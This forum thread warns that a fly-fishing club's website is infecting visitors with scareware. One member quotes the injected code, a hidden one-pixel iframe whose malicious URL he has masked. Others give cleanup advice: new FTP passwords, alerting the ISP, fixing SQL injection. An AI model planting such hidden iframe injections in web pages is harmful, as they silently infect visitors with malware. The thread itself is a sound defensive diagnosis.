NFR Avoid Puget Sound Fly Fishers site (MALWARE INFECTION)

Discussion in 'Fly Fishing Forum' started by DennisE, Jul 16, 2012.

  1. DennisE

    DennisE Topwater and tying.

    I don't know how long it will be until it gets fixed, but I strongly advise NOT trying their site. Just opening their home page will get your system infected with "Live Security Platinum". Luckily I work in IT and was using my home system, so I was able to iradicate this "Scareware" and Trojan pest. It isn't an experience I would recommend, however. This happened to me twice in the last week (including today) so they are still infected.
    I sent them a message through this site a few days ago, but got no response. I'll be going to the meeting on Thursday so I'll bring it up there.
  2. Flyborg

    Flyborg Active Member

    It's an iframe injection. The offensive piece of code is in the first line generated to the client on their home page:

    <iframe src="http://*********.in/in.cgi?55764" width="1" height="1" frameborder="0"></iframe>
    (I blocked out the actual URL)

    Tell them to change their FTP passwords and alert their ISP that they've been hit with an iframe injection. They'll also need to edit any files with the offensive piece of code. Just a quick glance tells me it's probably just on their home page; if it's being generated dynamically they'll need to find the code that's doing it, but my guess is someone just tossed a static line in there.
  3. Davy

    Davy Active Member

    that's not fun
  4. Flyborg

    Flyborg Active Member

    Left untended it'll get the site blacklisted from Google, so it could be worse :) Most of these site infections happen due to weak FTP passwords, as well as hosting software vulnerabilities. Keep your passwords strong and software up to date (especially wordpress!).
  5. I do not know enough about this tech stuff. Yet if they have a bug why would you not just call them and tell them?
  6. Whitey

    Whitey Active Member

    note to self: when computer breaks, call flyborg.
  7. Pete Bridge

    Pete Bridge Member

    Every time flyborg posts on a thread, I find myself clicking his avitar and laughing my ass off... Cant get over it.
  8. Westfork

    Westfork Member

    Changing the FTP credentials might not help much. IFRAME malware most like occurs from SQL injection... sloppy coding, in other words.

    If the miscreant had FTP access, you'd find hundreds of redirect files.... and banners, popups, etc.

    Sanitize those Database queries or people talk about you on forums like this.